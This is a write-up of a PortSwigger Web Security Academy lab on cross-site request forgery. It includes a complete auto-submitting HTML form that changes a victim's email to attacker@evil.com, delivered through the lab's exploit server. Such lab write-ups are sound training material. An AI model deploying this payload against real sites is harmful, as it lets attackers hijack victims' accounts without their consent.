CSRF vulnerability with no defenses | Dec 15, 2022
Introduction
Welcome to my another writeup! In this Portswigger Labs lab, you'll learn: CSRF vulnerability with no defenses! Without further ado, let's dive in.
- Overall difficulty for me (From 1-10 stars): ★☆☆☆☆☆☆☆☆☆
Background
This lab's email change functionality is vulnerable to CSRF.
To solve the lab, craft some HTML that uses a CSRF attack to change the viewer's email address and upload it to your exploit server.
You can log in to your own account using the following credentials: wiener:peter
Exploitation
Home page:
Login as user wiener
:
In here, we can update our email address!
Let's use Burp Suite to intercept the request:
When we click the Update email
button, it'll send a POST request to /my-account/change-email
with the parameter email
.
However, there is no CSRF token to prevent other website to send the same request!
To exploit this CSRF vulnerbility, we can craft a web page that automatically send the same request!
Let's inspect how this website construct the form:
<form class="login-form" name="change-email-form" action="/my-account/change-email" method="POST">
<label>Email</label>
<input required type="email" name="email" value="">
<button class='button' type='submit'> Update email </button>
</form>
Armed with above information, we can craft a form that perform the same request:
<html>
<head>
<title>CSRF-1</title>
</head>
<body>
<form action="https://0a3700ea032ba1d8c2ef1284006800d3.web-security-academy.net/my-account/change-email" method="POST">
<input type="hidden" name="email" value="attacker@evil.com">
</form>
<script>
document.forms[0].submit();
</script>
</body>
</html>
To host this page, I'll use python's module http.server
:
┌──(root🌸siunam)-[~/ctf/Portswigger-Labs/CSRF/CSRF-1]
└─# python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
Now, we can test it locally.
If we go to http://localhost/index.html
, it'll automatically send a POST request to https://0a3700ea032ba1d8c2ef1284006800d3.web-security-academy.net/my-account/change-email
with the parameter email
, and it's value is attacker@evil.com
:
It works, as we have the session cookie and that endpoint doesn't have any CSRF protections!!
To change other users' email, we can use PortSwigger Lab's exploit server:
Copy and paste our payload to Body
and click Store
:
Finally, we can click the Deliver exploit to victim
button:
And we successfully changed a user's email address!
What we've learned:
- CSRF vulnerability with no defenses